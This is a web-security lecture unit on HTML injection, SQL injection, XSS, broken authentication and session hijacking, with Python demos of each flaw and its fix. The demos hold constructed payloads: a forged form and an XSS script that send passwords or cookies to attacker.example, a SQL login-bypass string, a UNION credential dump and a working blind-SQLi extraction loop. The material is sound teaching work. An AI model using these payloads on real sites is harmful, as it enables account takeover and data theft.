UNIT - 3
OUTLINE
HTML Injection
SQL Injection
XSS Attack, Types of XSS
Defence mechanism of SQL & XSS
Broken Authentication & Session Hijacking
Security Misconfiguration
Malicious File Inclusion & Directory Traversal
HTML INJECTION
HTML injection is an attack in which user-supplied input is written into
a web page's HTML without being encoded, so the browser parses the
attacker's text as markup instead of displaying it.
This can lead to a variety of issues, from minor website defacement
(fake content, forged login forms) to serious data breaches.
Unlike vulnerabilities that exploit weaknesses in the server or the
database, HTML injection targets the markup language that forms the
backbone of most websites: it manipulates the structure and content of
the page as the victim's browser renders it.
COMMON CAUSES
Negligence is one of the most common root causes of HTML injection.
A lack of input validation, and above all a lack of output encoding,
tops the list: when user-supplied text is copied into a page verbatim,
an attacker can insert markup without hindrance.
Misconfigured web servers and frameworks (for example, a template engine
with automatic escaping switched off) can also open the door.
Lastly, insecure coding practices, stemming from a lack of awareness or
haste, pave the way for these attacks.
While these causes might seem technical, they often boil down to human
error. Whether it is a developer overlooking an encoding step or a
server admin misconfiguring settings, the human element is ever-present.
TYPES OF HTML INJECTION ATTACKS
Stored HTML Injection: Stored HTML injection, also known as persistent
injection, is a type of attack where the malicious markup is saved on
the target server (in a database, a forum post, a comment field) and
served to users every time they access a particular page. Once the
payload is in place, it affects every visitor without the attacker
having to do anything further.
As an example, an attacker might embed a forged login form, or a link
to an attacker-controlled site, in a forum post. Every unsuspecting
user who reads the post is shown the injected content, and those who
fill in the form or click the link hand over credentials or other data.
When the injected markup includes script, the attack is cross-site
scripting (XSS), covered later in this unit.
Reflected HTML Injection: Unlike stored injections, reflected attacks
are not housed on the server. The payload travels in the request,
usually in a URL parameter, and the server echoes it back into the
response page (a search result, an error message, a greeting). Delivery
therefore relies on phishing emails or messages that lure users into
clicking a crafted link.
For instance, an attacker might send an email posing as a trusted
entity, urging the recipient to click on a link to the legitimate site.
The link carries the malicious markup, which the vulnerable page
reflects back and the victim's browser renders, leading to the desired
malicious outcome.
DOM-based HTML Injection: The attack targets the Document Object Model
(DOM) of a webpage, which represents the page's structure. Here the
server never sees the payload: client-side JavaScript reads
attacker-controlled data (for example, from the URL fragment after #)
and writes it into the page with an API such as innerHTML, so the
injected markup or script is parsed and executed in the browser.
Understanding the DOM is crucial for web developers and security
professionals alike. It is the bridge between HTML and JavaScript, and
any place where untrusted data is written into it can lead to
significant security breaches. Being aware of how these attacks operate
is the first step in prevention.
POTENTIAL RISKS AND IMPACTS
Data Theft and Breaches
Malware Distribution
Website Defacement
PREVENTION AND MITIGATION STRATEGIES
Input Validation and Sanitization: By ensuring that all user inputs
are strictly validated against a set criterion, one can block most
malicious inputs at the door. This involves checking data types,
lengths, and patterns (an allowlist of what the field may contain) to
ensure they adhere to expected values. Sanitization involves cleaning
or modifying user input to remove any potentially harmful elements.
Validation alone is not enough, because many legitimate fields must
accept characters such as < and &. The decisive control is output
encoding: escaping user data at the moment it is written into the page,
in a way appropriate to the context (text, attribute, URL), so that the
browser displays it as text rather than parsing it as markup.
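The two controls just described, as an added Python example that is not part of the original slides: an allowlist validator for a username field, a vulnerable greeting that concatenates user data into markup, and the same greeting with output encoding, plus a link renderer that encodes for the attribute and URL contexts separately. The payload, the page layout and the field names are constructed for the demonstration.

```python
import html
import re
from urllib.parse import quote

# Allowlist for a username field: only these characters, only this length.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def validate_username(value: str) -> bool:
    """Reject anything that is not a plausible username, before it is stored."""
    return USERNAME_RE.fullmatch(value) is not None


def render_greeting_vulnerable(name: str) -> str:
    """The bug: user data is concatenated straight into the markup."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """The fix: encode at the point of output, so < > & " become text."""
    return f"<p>Welcome back, {html.escape(name)}!</p>"


def render_profile_link_safe(display_name: str, user_id: str) -> str:
    """Attribute and URL contexts need their own encoding.

    quote=True also escapes the quote characters, so the value cannot close
    the attribute and start a new one; the path segment is percent-encoded
    so it cannot break out of the href or climb the path.
    """
    return (
        f'<a href="/users/{quote(user_id, safe="")}" '
        f'title="{html.escape(display_name, quote=True)}">'
        f"{html.escape(display_name)}</a>"
    )


# Constructed reflected-injection payload: a forged login form that would
# appear inside the trusted page and post the victim's password elsewhere.
DEFACEMENT_PAYLOAD = (
    "<h1>Session expired</h1>"
    '<form action="https://attacker.example/collect">'
    'Password: <input name="pw"><input type="submit"></form>'
)


def contains_markup(rendered: str, tag: str) -> bool:
    """True if the rendered page still contains the tag as live markup."""
    return f"<{tag}" in rendered


if __name__ == "__main__":
    print(render_greeting_vulnerable(DEFACEMENT_PAYLOAD))  # the form is live
    print(render_greeting_safe(DEFACEMENT_PAYLOAD))        # the form is shown as text
    print(render_profile_link_safe('" onmouseover="alert(1)', "42/../admin"))
```

The validator rejects the payload outright, but a comment or message field could not use such a narrow allowlist; there the escaped rendering is what keeps the injected form inert.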
Regular Security Audits: Complacency is a security professional's worst
enemy. Regular security audits are essential to identify and rectify
vulnerabilities before they can be exploited. Audits involve a thorough
examination of a website's code, infrastructure, and practices to
pinpoint potential weak spots.
SQL INJECTION
A SQL injection attack consists of insertion or "injection" of a SQL
query via the input data from the client to the application.
A successful SQL injection exploit can read sensitive data from the
database, modify database data (Insert/Update/Delete), execute
administration operations on the database (such as shutting down the
DBMS), recover the content of a given file present on the DBMS file
system and in some cases issue commands to the operating system.
SQL injection attacks are a type of injection attack, in which SQL
commands are injected into data-plane input in order to affect the
execution of predefined SQL commands.
TYPES OF SQL INJECTION
In-band SQLi: The attacker uses the same channel of communication to
launch the attack and to gather the results. In-band SQLi's simplicity
and efficiency make it one of the most common types of SQLi attack.
There are two sub-variations of this method:
Error-based SQLi: the attacker performs actions that cause the database
to produce error messages. The attacker can use the data provided by
these error messages (table and column names, fragments of the failing
query) to gather information about the structure of the database.
Union-based SQLi: this technique takes advantage of the UNION SQL
operator, which combines the result sets of two or more SELECT
statements into a single result set. The injected SELECT must return
the same number of columns as the original query; its rows are then
included in the normal HTTP response, where the attacker can read them.
Inferential (Blind) SQLi: The attacker sends data payloads to the
server and observes the response and behaviour of the server to learn
more about its structure. This method is called blind SQLi because no
data from the database is returned directly to the attacker; each
request leaks at most one bit (the injected condition was true or
false), so the attacker asks many questions.
Boolean-based: the attacker sends a SQL query to the database prompting
the application to return a result. The result will vary depending on
whether the injected condition is true or false. Based on the result,
the content of the HTTP response will change or stay unchanged.
Time-based: the attacker sends a SQL query to the database which makes
the database wait (for a period in seconds) before it responds. From
the time the database takes to respond, the attacker can tell whether
the injected condition is true or false.
Out-of-band SQLi: The attacker can only carry out this form of attack
when certain features are enabled on the database server used by the
web application. This form of attack is primarily used as an
alternative to the in-band and inferential SQLi techniques.
Out-of-band SQLi is performed when the attacker cannot use the same
channel to launch the attack and gather information, or when a server
is too slow or unstable for those actions to be performed.
These techniques count on the capacity of the database server to make
DNS or HTTP requests, which carry the extracted data to a host the
attacker controls.
DEFENCE MECHANISM AGAINST SQL INJECTION
[Link]
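The attack classes above and the parameterised-query defence, as an added Python example that is not part of the original slides. It uses an in-memory SQLite database with a constructed users and products table; the login and search functions, the bypass string, the UNION payload and the blind extraction loop are all written for this demonstration. The example goes slightly beyond the slides by showing boolean-based blind extraction as a working loop rather than a description.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows for the demo (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES ('alice', 'hunter2'), ('bob', 'letmein');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
        """
    )
    return conn


# --- vulnerable: user input is spliced into the SQL text --------------------
def login_vulnerable(conn, username: str, password: str) -> bool:
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def search_vulnerable(conn, term: str) -> list:
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


# --- fixed: parameterised queries; the driver never lets data become SQL ----
def login_safe(conn, username: str, password: str) -> bool:
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def search_safe(conn, term: str) -> list:
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# --- attacker side -------------------------------------------------------------
AUTH_BYPASS = "alice'--"  # closes the string and comments out the password check

# In-band, union-based: two columns to match the search query's two columns.
UNION_DUMP = "x%' UNION SELECT username, password FROM users--"


def blind_extract_password(conn, login, username: str, max_len: int = 16) -> str:
    """Boolean-based blind SQLi: the login endpoint only answers yes or no, but
    asking 'is character N of the password X?' once per guess recovers it."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"{username}' AND substr(password,{pos},1)='{ch}'--"
            if login(conn, probe, "anything"):
                recovered += ch
                break
        else:
            break  # no character matched: end of password (or not injectable)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, AUTH_BYPASS, "wrong"))   # True: logged in as alice
    print(login_safe(db, AUTH_BYPASS, "wrong"))         # False
    print(search_vulnerable(db, UNION_DUMP))            # credentials listed as "products"
    print(search_safe(db, UNION_DUMP))                  # []
    print(blind_extract_password(db, login_vulnerable, "alice"))  # hunter2
    print(blind_extract_password(db, login_safe, "alice"))        # ''
```

The safe variants do not try to filter quotes or comment markers; they hand the values to the driver as parameters, so the database never interprets them as SQL. Time-based blind injection works the same way as the boolean loop, with a delay function in place of the true/false difference in the response.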
XSS ATTACK
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted
websites.
XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser-side script, to a
different end user.
Because the victim's browser thinks the script came from a trusted
source, the malicious script can access any cookies, session tokens, or
other sensitive information retained by the browser and used with that
site.
REFLECTED XSS ATTACKS
Reflected attacks are those where the injected script is reflected off
the web server, such as in an error message, search result, or any
other response that includes some or all of the input sent to the server
as part of the request.
Reflected attacks are delivered to victims via another route, such as
in an e-mail message, or on some other website.
When a user is tricked into clicking on a malicious link, submitting a
specially crafted form, or even just browsing to a malicious site, the
injected code travels to the vulnerable web site, which reflects the
attack back to the user's browser.
Reflected XSS is also sometimes referred to as Non-Persistent or Type-I
XSS.
STORED XSS ATTACKS
Stored attacks are those where the injected script is
permanently stored on the target servers, such as in a
database, in a message forum, visitor log, comment
field, etc.
The victim then retrieves the malicious script from the
server when it requests the stored information.
Stored XSS is also sometimes referred to as Persistent or
Type-II XSS.
XSS ATTACK CONSEQUENCES
XSS can cause a variety of problems for the end user that range in
severity from an annoyance to complete account compromise.
The most severe XSS attacks involve disclosure of the user’s session
cookie, allowing an attacker to hijack the user’s session and take
over the account.
Other damaging attacks include the disclosure of end user files,
installation of Trojan horse programs, redirecting the user to some
other page or site, or modifying presentation of content.
DEFENCE MECHANISM AGAINST XSS
[Link]
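Stored XSS and one defence for it, as an added Python example that is not part of the original slides. A constructed comment board stores posts verbatim (persistence is the point of a stored attack) and, in its hardened form, runs each body through an allowlist sanitizer on output: only a few formatting tags survive, event-handler attributes and javascript: URLs are dropped, script and style elements are removed together with their contents, and all text is re-escaped. The sanitizer is built on the standard library's html.parser for the demonstration and is not a substitute for a maintained library in production.

```python
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://")


class AllowlistSanitizer(HTMLParser):
    """Rebuild the input keeping only allowlisted tags and attributes.

    Everything else (script/style and their contents, on* event handlers,
    javascript: URLs, unknown tags) is dropped; text is re-escaped on output.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts = []       # output fragments
        self.open_tags = []   # allowlisted tags currently open
        self.skip_depth = 0   # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onclick=, onerror=, style=, ...
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_URL_SCHEMES):
                continue  # drops javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.parts.append(f"<{tag}{''.join(kept)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if tag in self.open_tags:
            # close it and anything still open inside it, as a browser would
            while self.open_tags:
                closing = self.open_tags.pop()
                self.parts.append(f"</{closing}>")
                if closing == tag:
                    break

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.parts.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()  # flush any buffered text
        while self.open_tags:  # close tags the author left open
            self.parts.append(f"</{self.open_tags.pop()}>")
        return "".join(self.parts)


def sanitize(fragment: str) -> str:
    s = AllowlistSanitizer()
    s.feed(fragment)
    return s.result()


class CommentBoard:
    """Constructed stand-in for a forum: comments are stored, then served to
    every reader. With sanitize_on_output=False it is the vulnerable version."""

    def __init__(self, sanitize_on_output: bool) -> None:
        self.sanitize_on_output = sanitize_on_output
        self.comments = []

    def post(self, author: str, body: str) -> None:
        self.comments.append((author, body))  # stored verbatim, as persistence requires

    def render(self) -> str:
        out = []
        for author, body in self.comments:
            body = sanitize(body) if self.sanitize_on_output else body
            out.append(f'<div class="comment"><b>{html.escape(author)}</b>: {body}</div>')
        return "\n".join(out)


# Constructed stored-XSS payload: sends the cookie of everyone who views it.
COOKIE_THIEF = (
    '<p onclick="steal()">nice post <script>'
    'new Image().src="https://attacker.example/?c="+document.cookie'
    '</script><a href="javascript:alert(1)">click</a>'
    '<img src=x onerror="alert(document.cookie)"></p>'
)
```

Sanitizing on output rather than on input means a rule change (a tag newly disallowed) takes effect for comments that were stored before the change, which is the usual argument for encoding and sanitizing at render time.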
BROKEN AUTHENTICATION
Broken authentication is a critical vulnerability in web applications
where the authentication and session management mechanisms are flawed
or improperly implemented, allowing attackers to compromise passwords,
keys, or session tokens, or to exploit other implementation flaws to
assume other users' identities.
The term 'session management' refers to the process of maintaining a
user's state and data across multiple requests.
When a user logs into an application, their credentials are
authenticated, and a session is established. This session persists as
the user interacts with the application, allowing them to stay logged
in. If the session management is mishandled, it can lead to broken
authentication.
This vulnerability can arise from numerous scenarios, including:
Weak password policies that allow the use of common or easily
guessable passwords.
Improper session management, such as not setting session timeouts, not
protecting session IDs, or exposing session IDs in the URL (where they
end up in browser history, logs and Referer headers).
Inadequate handling of user passwords, such as not hashing and salting
them properly.
According to the Open Web Application Security Project (OWASP), broken
authentication is one of the most severe threats to web applications
and APIs.
Use of Passwords as the Only Authentication Factor
Relying solely on passwords for user authentication is a significant
vulnerability in web application security.
Passwords are often weak due to poor user practices such as using
easy-to-guess passwords or reusing the same password across sites.
Attackers exploit weak or reused passwords through various methods like
phishing attacks, credential stuffing (replaying username/password
pairs leaked from another site), or brute force attacks.
This vulnerability becomes more critical when additional layers of
security, like multi-factor authentication (MFA), are not in place.
Application Session Timeouts Aren't Set Properly
When a user logs into a web application, a session is established. This
session should expire after a period of inactivity to prevent
unauthorized access in case the user leaves their device unattended.
If the session timeout is not properly set, a session ID that has been
stolen, or left behind in the browser of a shared machine, stays valid
indefinitely, allowing an attacker to hijack the session and gain
access to the user's account.
A related flaw is session fixation, where an attacker induces a user to
authenticate with a session ID the attacker already knows, and then
uses that same session ID to gain unauthorized access to the user's
account. Fixation is prevented by issuing a new session ID at login;
short timeouts only narrow the window in which a fixed or stolen ID is
useful.
Passwords Not Properly Hashed and Salted
Hashing is a one-way process that transforms a password into a
fixed-size digest, which is stored in place of the password itself.
Salting involves adding an additional, random string of characters to
the password before it is hashed, so that two users with the same
password get different digests and precomputed tables are useless.
If an attacker manages to breach the system and gain access to the
password data, and if the passwords are not properly hashed and salted,
they could potentially crack the passwords using various methods such
as brute force attacks, dictionary attacks, or rainbow table attacks.
A fast general-purpose hash such as MD5 or SHA-1 gives little
protection even with a salt; password storage calls for a deliberately
slow function (bcrypt, scrypt, Argon2 or PBKDF2) so that each guess
costs the attacker measurable time.
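Salted, slow hashing next to the unsalted baseline, as an added Python example that is not part of the original slides. The storage format, the iteration count and the small list of "common passwords" standing in for a rainbow table are assumptions made for the demonstration; the hashing itself uses the standard library's PBKDF2-HMAC-SHA256 and a constant-time comparison.

```python
import base64
import hashlib
import hmac
import os

# Work factor assumed for the demo; tune it to your hardware. OWASP's
# published guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, slow hash. The output carries its own parameters so the
    iteration count can be raised later without breaking old records."""
    salt = os.urandom(16)  # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        "pbkdf2_sha256",
        str(iterations),
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    ])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and parameters; compare in constant time."""
    algo, iterations, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


# --- the insecure baseline the slide warns about ------------------------------
def unsalted_md5(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Constructed stand-in for a precomputed lookup (rainbow) table: with no salt,
# one precomputation cracks every user who chose any of these passwords.
COMMON_PASSWORDS = ["123456", "password", "hunter2", "letmein", "qwerty"]
MD5_LOOKUP = {unsalted_md5(p): p for p in COMMON_PASSWORDS}


def crack_unsalted(stored_md5: str):
    """Instant: one dictionary lookup, no hashing at attack time."""
    return MD5_LOOKUP.get(stored_md5)


def same_password_detectable(user_hashes: list) -> bool:
    """Unsalted storage leaks password reuse: equal passwords, equal hashes."""
    return len(set(user_hashes)) < len(user_hashes)
```

With a per-user salt the attacker cannot precompute anything and cannot even tell which users share a password; the slow function then makes each remaining guess cost roughly as much as a legitimate login.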
IMPACT OF BROKEN AUTHENTICATION ATTACK
For an end-user, a broken authentication attack could mean unauthorized
access to their account, leading to the theft of sensitive personal
data such as credit card information, social security numbers, and
more.
For businesses, the consequences can be even more severe. A successful
attack could potentially give cybercriminals access to privileged
accounts, allowing them to manipulate data, perform malicious actions,
or even take control of the entire system.
This could lead to substantial financial losses, damage to the
organization's reputation, loss of customer trust, and potential legal
implications.
HOW TO FIX BROKEN AUTHENTICATION
Control Session Length
The session length is the duration in which the session remains
active.
Keep session lengths as short as possible without affecting the user
experience.
This practice reduces the window of opportunity for an attacker to
exploit the session.
Moreover, idle session timeouts should be implemented.
Rotate and Invalidate Session IDs
Rotating session IDs means changing the session ID after a certain
period or after certain critical operations (login in particular, and
any change of privilege). This practice makes it harder for an attacker
to predict or guess the session ID, and it makes an ID captured earlier
useless.
In addition to rotating session IDs, it is also crucial to invalidate
them when they are no longer needed. For example, when a user logs out,
their session ID should be invalidated immediately on the server side.
This prevents an attacker from using an old session ID to gain
unauthorized access to the system.
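The session controls above (random IDs, idle and absolute timeouts, rotation at login and after sensitive operations, server-side invalidation at logout, cookie flags), as an added Python example that is not part of the original slides. The store's layout, the timeout values and the cookie attribute set are assumptions for the demonstration, not any framework's API; the clock is injectable so that expiry can be exercised without waiting.

```python
import secrets
import time
from typing import Optional

IDLE_TIMEOUT = 15 * 60       # seconds of inactivity before a session dies
ABSOLUTE_TIMEOUT = 8 * 3600  # hard cap on lifetime, however active the user is


def new_session_id() -> str:
    """256 bits from the OS CSPRNG: not a counter, a timestamp or a hash of
    the username, so an attacker cannot predict or enumerate it."""
    return secrets.token_urlsafe(32)


class SessionStore:
    """In-memory server-side session table (assumed layout for the demo)."""

    def __init__(self, clock=time.time) -> None:
        self._clock = clock
        self._sessions = {}  # session_id -> {"user", "created", "last_seen"}

    def login(self, user: str, presented_sid: Optional[str] = None) -> str:
        """Authenticate and issue a fresh ID. Whatever ID the browser arrived
        with (possibly planted by an attacker: session fixation) is discarded
        rather than upgraded to an authenticated session."""
        if presented_sid is not None:
            self._sessions.pop(presented_sid, None)
        sid = new_session_id()
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Resolve a presented ID to a user, enforcing both timeouts."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess["last_seen"] > IDLE_TIMEOUT or now - sess["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        sess["last_seen"] = now
        return sess["user"]

    def rotate(self, sid: str) -> Optional[str]:
        """Swap the ID after a critical operation (privilege change, password
        change). An ID captured before the swap stops working."""
        sess = self._sessions.pop(sid, None)
        if sess is None:
            return None
        new_sid = new_session_id()
        self._sessions[new_sid] = sess
        return new_sid

    def logout(self, sid: str) -> None:
        """Invalidate on the server; clearing the cookie alone is not enough."""
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    """Set-Cookie value: HttpOnly keeps page scripts (XSS) from reading it,
    Secure keeps it off plaintext HTTP, SameSite limits cross-site sending."""
    return f"sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"
```

Because the session table lives on the server, an ID the browser still holds after logout or expiry is worthless, which is the property a hijacker most depends on not having.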
Multi-factor Authentication
MFA is a method of authentication that requires users to provide two
or more verification factors to gain access to a resource.
The factors used in MFA can be something the user knows (like a
password), something the user has (like a physical token or a
smartphone), or something the user is (like a fingerprint or other
biometric trait).
By requiring multiple forms of verification, MFA significantly
enhances the security of your system.
SESSION HIJACKING
Session hijacking is a cyberattack in which bad actors gain
unauthorized access to a user's active website or application session.
These attacks exploit vulnerabilities in web session management by
enabling the cyberattacker to impersonate a legitimate user.
Session hijacking involves intercepting or guessing the session
identifier, a unique token assigned to a user upon login.
Obtaining access to this identifier enables the attacker to assume the
user's identity within the system, potentially accessing sensitive
information, making unauthorized transactions, or performing other
malicious actions.
HOW SESSION HIJACKING WORKS
Initial authentication: The legitimate user enters their credentials to
log into a website or application. The server verifies these
credentials and establishes a new session for the user.
Session ID generation: Upon successful authentication, the server
creates a unique session identifier. This ID is typically a long,
random string intentionally designed to be challenging to guess. The
server sends this ID to the user's browser, where it is usually stored
as a cookie.
Normal user activity: The authenticated user interacts with the website
or application. Each request they make to the server includes the
session ID, allowing the server to assign that particular request to
the user's authenticated session and maintain their state.
Attacker intervention: The attacker uses various techniques to predict
or intercept the session ID. Some techniques they might use include
sniffing unencrypted traffic, exploiting an XSS flaw to read the cookie,
leveraging malware on the user's machine, or exploiting weaknesses in
the website's session management system.
Session ID acquisition: The attacker successfully obtains a valid
session ID through one or more attack vectors. They can accomplish this
through real-time interception or by exploiting predictable session ID
generation patterns.
Impersonation: The attacker crafts requests to the server that include
the stolen session ID. From the server's perspective these requests
appear to come from the legitimate user, as the session ID is valid.
Unauthorized access: The server processes the attacker's requests as if
they were from the legitimate user. This grants the attacker the same
access and privileges as the original user, potentially compromising
sensitive data or functionality.
Malicious activities: With full access to the user's session, the
attacker can perform various unauthorized actions. These may include
viewing or modifying personal information, initiating financial
transactions, or using the compromised account to launch further
attacks.
Session termination: The hijacked session ends either when the
legitimate user logs out (potentially locking out the attacker), when
the session naturally expires due to inactivity, or when the attacker
ends their malicious activities to avoid detection.
EXAMPLES OF SESSION HIJACKING
Zoom bombing
During the COVID-19 pandemic, video conferencing platforms like Zoom
became targets for session hijackers. Attackers joined private video
sessions without authorization, typically meetings whose IDs were
shared publicly or easy to guess and whose settings required neither a
password nor host approval to enter.
Some hijackers would disrupt meetings by shouting profanities, sharing
offensive content etc.
In response, Zoom implemented enhanced privacy protections, including
meeting passwords and waiting rooms, helping hosts better control
participant access.
Slack
A flaw in Slack allowed attackers to force users into fake session
redirects, enabling the theft of session cookies. With these stolen
cookies, attackers could gain unauthorized access to all data shared
within a user's Slack account, potentially compromising sensitive
organizational information.
Slack's security team responded swiftly, patching the vulnerability
within 24 hours of its discovery, demonstrating the importance of rapid
response to security threats.
GitLab
In 2017, a security researcher identified a severe vulnerability in
GitLab's session management. The platform exposed users' session tokens
directly in URLs and employed persistent tokens that never expired.
GitLab addressed this issue by revising its token usage and storage
methods, emphasizing the critical nature of proper session token
management in web applications.
SECURITY MISCONFIGURATIONS
[Link]
FILE INCLUSION VULNERABILITY
[Link]